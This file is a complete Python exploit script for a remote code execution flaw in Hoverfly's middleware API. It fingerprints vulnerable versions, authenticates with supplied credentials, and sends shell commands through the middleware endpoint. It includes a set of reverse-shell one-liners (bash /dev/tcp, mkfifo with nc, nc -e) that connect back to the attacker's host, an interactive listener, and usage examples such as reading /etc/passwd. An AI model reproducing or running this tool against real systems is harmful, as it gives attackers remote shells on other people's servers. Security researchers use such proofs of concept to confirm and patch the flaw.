#!/usr/bin/env python3 # -*- coding: utf-8 -*- # author: Krishna Agarwal (https://kr1shna4garwal.com) # SPDX-License-Identifier: MIT import requests from requests.adapters import HTTPAdapter from urllib3.util.retry import Retry from colorama import Fore, Style, init import argparse import sys import json import time import socket import threading import urllib3 from typing import Optional, Dict, Tuple import logging import re import signal # Initialize colorama for cross-platform color support init(autoreset=True) # Disable SSL warnings for testing environments urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class C: HEADER = Fore.CYAN + Style.BRIGHT AUTHOR = Fore.RED + Style.BRIGHT SUCCESS = Fore.GREEN + Style.BRIGHT WARNING = Fore.YELLOW + Style.BRIGHT ERROR = Fore.RED + Style.BRIGHT INFO = Fore.BLUE + Style.BRIGHT BOLD = Style.BRIGHT RESET = Style.RESET_ALL class Logger: def __init__(self, verbose: bool = False, log_file: Optional[str] = None): self.verbose = verbose self.log_file = log_file self.setup_logging() def setup_logging(self): log_format = '%(asctime)s - %(levelname)s - %(message)s' level = logging.DEBUG if self.verbose else logging.INFO handlers = [] # Console handler console_handler = logging.StreamHandler(sys.stdout) console_handler.setLevel(level) handlers.append(console_handler) # File handler if specified if self.log_file: file_handler = logging.FileHandler(self.log_file) file_handler.setLevel(logging.DEBUG) file_handler.setFormatter(logging.Formatter(log_format)) handlers.append(file_handler) logging.basicConfig( level=level, format=log_format, handlers=handlers ) self.logger = logging.getLogger(__name__) def info(self, message: str): """Log info message with color""" print(f"{C.INFO}[?]{C.RESET} {message}") if self.verbose: self.logger.info(message) def success(self, message: str): """Log success message with color""" print(f"{C.SUCCESS}[+]{C.RESET} {message}") if self.verbose: self.logger.info(f"SUCCESS: {message}") def warning(self, message: str): """Log warning message with color""" print(f"{C.WARNING}[WARNING]{C.RESET} {message}") if self.verbose: self.logger.warning(message) def error(self, message: str): """Log error message with color""" print(f"{C.ERROR}[!]{C.RESET} {message}") if self.verbose: self.logger.error(message) def debug(self, message: str): """Log debug message""" if self.verbose: print(f"{C.HEADER}[%]{C.RESET} {message}") self.logger.debug(message) class InputValidator: """Input validation utilities""" @staticmethod def validate_host(host: str) -> bool: """Validate host format""" if not host: return False # Remove protocol if present if '://' in host: host = host.split('://', 1)[1] # Remove path if present host = host.split('/', 1)[0] # Validate IP address or hostname ip_pattern = re.compile( r'^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}' r'(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$' ) hostname_pattern = re.compile( r'^(?:[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)*[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?$' ) return bool(ip_pattern.match(host) or hostname_pattern.match(host) or host == 'localhost') @staticmethod def validate_port(port: int) -> bool: return 1 <= port <= 65535 @staticmethod def validate_credentials(username: str, password: str) -> bool: return bool(username and password and len(username.strip()) > 0 and len(password.strip()) > 0) class ReverseShellHandler: def __init__(self, lhost: str, lport: int, logger: Logger): self.lhost = lhost self.lport = lport self.logger = logger self.server_socket = None self.client_socket = None self.running = False def start_listener(self) -> bool: try: self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.server_socket.bind((self.lhost, self.lport)) self.server_socket.listen(1) self.server_socket.settimeout(30) # 30 second timeout self.logger.info(f"Listening for reverse shell on {self.lhost}:{self.lport}") return True except Exception as e: self.logger.error(f"Failed to start listener: {e}") return False def wforconn(self) -> bool: try: if not self.server_socket: return False self.logger.info("Waiting for reverse shell connection...") self.client_socket, addr = self.server_socket.accept() self.logger.success(f"Reverse shell connected from {addr[0]}:{addr[1]}") self.running = True return True except socket.timeout: self.logger.error("Timeout waiting for reverse shell connection") return False except Exception as e: self.logger.error(f"Error waiting for connection: {e}") return False def interactive_shell(self): """Handle interactive shell session""" if not self.client_socket: return self.logger.success("Starting interactive shell session...") print(f"{C.SUCCESS}[SHELL]{C.RESET} Type 'exit' to quit the shell") def receive_data(): """Receive data from remote shell""" while self.running: try: if not self.client_socket: break data = self.client_socket.recv(4096) if not data: break print(data.decode('utf-8', errors='ignore'), end='') except: break # Start receiving thread recv_thread = threading.Thread(target=receive_data, daemon=True) recv_thread.start() try: while self.running: try: command = input() if command.lower() in ['exit', 'quit']: break self.client_socket.send((command + '\n').encode()) except KeyboardInterrupt: break except: break finally: self.running = False if self.client_socket: self.client_socket.close() if self.server_socket: self.server_socket.close() def cleanup(self): self.running = False if self.client_socket: try: self.client_socket.close() except: pass if self.server_socket: try: self.server_socket.close() except: pass class HoverflyMWPwn: """ The main class""" def __init__(self, args: argparse.Namespace): self.args = args self.logger = Logger(verbose=args.verbose) self.session = self._create_session() self.base_url = self._build_base_url() self.token = None self.validator = InputValidator() # Validate inputs self._validate_inputs() def _validate_inputs(self): """Validate all user inputs""" if not self.validator.validate_host(self.args.host): self.logger.error("Invalid host format") sys.exit(1) if not self.validator.validate_port(self.args.port): self.logger.error("Invalid port number") sys.exit(1) if self.args.username and self.args.password: if not self.validator.validate_credentials(self.args.username, self.args.password): self.logger.error("Invalid credentials format") sys.exit(1) if self.args.local_host and self.args.local_port: if not self.validator.validate_host(self.args.local_host): self.logger.error("Invalid local host format") sys.exit(1) if not self.validator.validate_port(self.args.local_port): self.logger.error("Invalid local port number") sys.exit(1) def _create_session(self) -> requests.Session: session = requests.Session() # Retry strategy retry_strategy = Retry( total=3, backoff_factor=1, status_forcelist=[429, 500, 502, 503, 504], ) adapter = HTTPAdapter(max_retries=retry_strategy) session.mount("http://", adapter) session.mount("https://", adapter) # Security headers session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'en-US,en;q=0.9', 'Accept-Encoding': 'gzip, deflate, br', 'Connection': 'keep-alive', 'sec-ch-ua': '"Not)A;Brand";v="8", "Chromium";v="138"', 'sec-ch-ua-mobile': '?0', 'sec-ch-ua-platform': '"macOS"', }) return session def _build_base_url(self) -> str: """Build base URL from host and port""" protocol = "https" if not self.args.skip_ssl and self.args.port == 443 else "http" return f"{protocol}://{self.args.host}:{self.args.port}" def cool_banner(self): banner = f""" {C.HEADER} _ _ ___ _ __ ____ _______ ___ _ | || |_____ _____ _ _| __| |_ _ | \/ \ \ / / _ \ \ / / \| | | __ / _ \ V / -_) '_| _|| | || | | |\/| |\ \/\/ /| _/\ \/\/ /| .` | |_||_\___/\_/\___|_| |_| |_|\_, | |_| |_(_)_/\_(_)_| \_/\_/ |_|\_| |__/ {C.RESET} {C.INFO}Hoverfly Middleware RCE Vulnerability Proof Of Concept{C.RESET}\n Author:{C.AUTHOR} Krishna Agarwal (https://github.com/kr1shna4garwal){C.RESET}\n {C.INFO}Target: {C.BOLD}{self.base_url}{C.RESET} """ print(banner) def check_target_reachability(self) -> bool: """Check if target is reachable""" self.logger.info("Checking target reachability...") try: # Test basic connectivity response = self.session.get( f"{self.base_url}/api/v2/hoverfly/version", timeout=10, verify=not self.args.skip_ssl ) self.logger.success("Target is reachable") return True except requests.exceptions.ConnectTimeout: self.logger.error("Connection timeout - target may be unreachable") return False except requests.exceptions.ConnectionError: self.logger.error("Connection error - target is unreachable") return False except Exception as e: self.logger.error(f"Unexpected error checking reachability: {e}") return False def check_version(self) -> Tuple[bool, bool]: """Check product version and authentication status""" self.logger.info("Checking product version...") try: response = self.session.get( f"{self.base_url}/api/v2/hoverfly/version", timeout=10, verify=not self.args.skip_ssl ) if response.status_code == 401: self.logger.info("Target requires authentication") return False, True # Not vulnerable check done, auth required elif response.status_code == 200: try: data = response.json() version = data.get('version', '') self.logger.info(f"Detected version: {version}") # Check if version is vulnerable (v1.11.2 or older) if self._is_vulnerable_version(version): self.logger.success(f"Target is running vulnerable version: {version}") return True, False # Vulnerable, no auth required else: self.logger.warning(f"Target version {version} may not be vulnerable") return False, False except json.JSONDecodeError: self.logger.error("Invalid JSON response from version endpoint") return False, False else: self.logger.error(f"Unexpected status code: {response.status_code}") return False, False except Exception as e: self.logger.error(f"Error checking version: {e}") return False, False def _is_vulnerable_version(self, version: str) -> bool: """Check if version is vulnerable""" # Remove 'v' prefix if present if version.startswith('v'): version = version[1:] try: # Parse version numbers version_parts = [int(x) for x in version.split('.')] vulnerable_parts = [1, 11, 2] # v1.11.2 # Compare version numbers for i, (current, vulnerable) in enumerate(zip(version_parts, vulnerable_parts)): if current < vulnerable: return True elif current > vulnerable: return False # If all parts are equal, it's vulnerable (v1.11.2 is vulnerable) return len(version_parts) >= len(vulnerable_parts) except (ValueError, IndexError): self.logger.warning(f"Could not parse version: {version}") return True # Assume vulnerable if we can't parse def authenticate(self) -> bool: """Authenticate and obtain session token""" if not self.args.username or not self.args.password: self.logger.error("Username and password required for authentication") return False self.logger.info("Attempting authentication...") try: auth_data = { "username": self.args.username, "password": self.args.password } # Update headers for authentication request headers = { 'Content-Type': 'application/json', 'Origin': self.base_url, 'Referer': f"{self.base_url}/login", 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Dest': 'empty', } response = self.session.post( f"{self.base_url}/api/token-auth", json=auth_data, headers=headers, timeout=10, verify=not self.args.skip_ssl ) if response.status_code == 200: try: data = response.json() self.token = data.get('token') # here we get the JWT token (.token) if self.token: self.logger.success("Authentication successful") # Update session headers with token self.session.headers.update({ 'Authorization': f'Bearer {self.token}' }) return True else: self.logger.error("No token in authentication response") return False except json.JSONDecodeError: self.logger.error("Invalid JSON in authentication response") return False else: self.logger.error(f"Authentication failed with status: {response.status_code}") return False except Exception as e: self.logger.error(f"Authentication error: {e}") return False def verify_authenticated_access(self) -> bool: """Verify authenticated access to version endpoint""" if not self.token: return False self.logger.info("Verifying authenticated access...") try: headers = { 'Referer': f"{self.base_url}/login", 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Dest': 'empty', } response = self.session.get( f"{self.base_url}/api/v2/hoverfly/version", headers=headers, timeout=10, verify=not self.args.skip_ssl ) if response.status_code == 200: try: data = response.json() version = data.get('version', '') self.logger.success(f"Authenticated access verified. Version: {version}") return self._is_vulnerable_version(version) except json.JSONDecodeError: self.logger.error("Invalid JSON in authenticated version response") return False else: self.logger.error(f"Authenticated access failed: {response.status_code}") return False except Exception as e: self.logger.error(f"Error verifying authenticated access: {e}") return False def generate_payload(self) -> Dict[str, str]: """Generate exploitation payload""" if self.args.command: # Custom command payload = { "binary": "/bin/sh", "script": self.args.command } self.logger.info(f"Using custom command: {self.args.command}") elif self.args.local_host and self.args.local_port: # Reverse shell payload reverse_shell_cmd = self._generate_reverse_shell_payload() payload = { "binary": "/bin/sh", "script": reverse_shell_cmd } self.logger.info(f"Using reverse shell payload: {self.args.local_host}:{self.args.local_port}") else: # Default reconnaissance command payload = { "binary": "/bin/sh", "script": "whoami" } self.logger.info("Using default reconnaissance payload") return payload def _generate_reverse_shell_payload(self) -> str: """Generate reverse shell payload""" payloads = [ f"bash -i >& /dev/tcp/{self.args.local_host}/{self.args.local_port} 0>&1", f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {self.args.local_host} {self.args.local_port} >/tmp/f &", f"bash -c 'bash -i >& /dev/tcp/{self.args.local_host}/{self.args.local_port} 0>&1'", f"sh -i >& /dev/tcp/{self.args.local_host}/{self.args.local_port} 0>&1", f"nc -e /bin/sh {self.args.local_host} {self.args.local_port}", f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {self.args.local_host} {self.args.local_port} >/tmp/f", ] # use #1 as this is the best return payloads[1] def exploit(self) -> bool: """Execute the exploitation""" self.logger.info("Preparing exploitation...") # Generate payload payload = self.generate_payload() # Start reverse shell listener if needed shell_handler = None shell_thread = None if self.args.local_host and self.args.local_port and not self.args.command: shell_handler = ReverseShellHandler( self.args.local_host, self.args.local_port, self.logger ) if not shell_handler.start_listener(): return False # Start listener in background thread def wait_for_shell(): if shell_handler and shell_handler.wforconn(): time.sleep(1) # Give time for connection to establish shell_handler.interactive_shell() shell_thread = threading.Thread(target=wait_for_shell, daemon=True) shell_thread.start() # Execute exploitation self.logger.info("Sending exploitation payload...") try: headers = { 'Content-Type': 'application/json', 'Referer': f"{self.base_url}/dashboard", 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Dest': 'empty', } response = self.session.put( f"{self.base_url}/api/v2/hoverfly/middleware", json=payload, headers=headers, timeout=30, verify=not self.args.skip_ssl ) self.logger.debug(f"Response status: {response.status_code}") self.logger.debug(f"Response headers: {dict(response.headers)}") if response.status_code == 422: # Expected response for successful exploitation response_text = response.text self.logger.debug(f"Response body: {response_text}") if "STDOUT:" in response_text: # Extract command output stdout_start = response_text.find("STDOUT:") if stdout_start != -1: stdout_content = response_text[stdout_start + 8:].strip() if stdout_content: self.logger.success("PWNED SUCCESSFUL :) 🎉") print(f"\n{C.SUCCESS}[COMMAND OUTPUT]{C.RESET}") print(f"{C.BOLD}{stdout_content}{C.RESET}\n") # If reverse shell, wait for connection if shell_handler and shell_thread: self.logger.info("Waiting for reverse shell connection...") shell_thread.join(timeout=10) if shell_handler.running: return True else: self.logger.warning("Reverse shell connection not established") return True # Still consider successful since command executed return True else: self.logger.warning("Command executed but no output received") return True self.logger.success("Pwning payload sent successfully") self.logger.info("Check your reverse shell listener for connection") if shell_handler and shell_thread: shell_thread.join(timeout=10) return True else: self.logger.error(f"Unexpected response status: {response.status_code}") self.logger.debug(f"Response: {response.text}") return False except Exception as e: self.logger.error(f"Pwning failed: {e}") return False finally: if shell_handler: shell_handler.cleanup() def run(self) -> bool: """Main execution flow""" self.cool_banner() # Check target reachability if not self.check_target_reachability(): return False # Check version and authentication requirements is_vulnerable, requires_auth = self.check_version() if requires_auth: if not self.args.username or not self.args.password: self.logger.error("Target requires authentication but no credentials provided") self.logger.info("Use -U/--username and -p/--password flags") return False # Authenticate if not self.authenticate(): return False # Verify authenticated access and check vulnerability if not self.verify_authenticated_access(): self.logger.error("Target does not appear to be vulnerable") return False elif not is_vulnerable: self.logger.error("Target does not appear to be vulnerable") return False # Execute exploitation self.logger.info("Target confirmed vulnerable - proceeding with exploitation") return self.exploit() def signal_handler(signum, frame): """Handle Ctrl+C gracefully""" print(f"\n{C.WARNING}[-]{C.RESET} Pwning interrupted by user") sys.exit(0) def main(): """Main function""" signal.signal(signal.SIGINT, signal_handler) parser = argparse.ArgumentParser( description="Hoverfly Middleware RCE Proof of concept", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: # Basic unauthenticated exploitation python3 hoverfly_poc.py -H localhost -P 8888 # Authenticated exploitation python3 hoverfly_poc.py -H localhost -P 8888 -U admin -p password # Reverse shell exploitation python3 hoverfly_poc.py -H target.com -P 8888 --lhost 10.0.0.1 --lport 4444 # Custom command execution python3 hoverfly_poc.py -H target.com -P 8888 -c "cat /etc/passwd" # HTTPS target with custom port python3 hoverfly_poc.py -H secure.target.com -P 9443 -U admin -p admin """ ) # Required arguments parser.add_argument('-H', '--host', required=True, help='Target host (IP address or hostname)') # Optional arguments parser.add_argument('-P', '--port', type=int, default=8888, help='Target port (default: 8888)') parser.add_argument('-U', '--username', help='Username for authentication') parser.add_argument('-p', '--password', help='Password for authentication') parser.add_argument('--lhost', '--local-host', dest='local_host', help='Local host for reverse shell') parser.add_argument('--lport', '--local-port', dest='local_port', type=int, help='Local port for reverse shell') parser.add_argument('-c', '--command', help='Custom command to execute') parser.add_argument('-k', '--skip-ssl', action='store_true', help='Skip SSL certificate verification') parser.add_argument('-V', '--verbose', action='store_true', help='Enable verbose output') parser.add_argument('--version', action='version', version='v1.0.0',) args = parser.parse_args() # Validate argument combinations if args.local_host and not args.local_port: parser.error("--lport is required when --lhost is specified") if args.local_port and not args.local_host: parser.error("--lhost is required when --lport is specified") if args.command and (args.local_host or args.local_port): parser.error("Cannot use --command with reverse shell options") try: # Create and run exploit exploit = HoverflyMWPwn(args) success = exploit.run() if success: print(f"\n{C.SUCCESS}[+]{C.RESET} Pwning completed successfully!") sys.exit(0) else: print(f"\n{C.ERROR}[!]{C.RESET} Pwning failed") sys.exit(1) except KeyboardInterrupt: print(f"\n{C.WARNING}[!]{C.RESET} Pwning interrupted") sys.exit(1) except Exception as e: print(f"\n{C.ERROR}[!]{C.RESET} {e}") sys.exit(1) if __name__ == "__main__": main()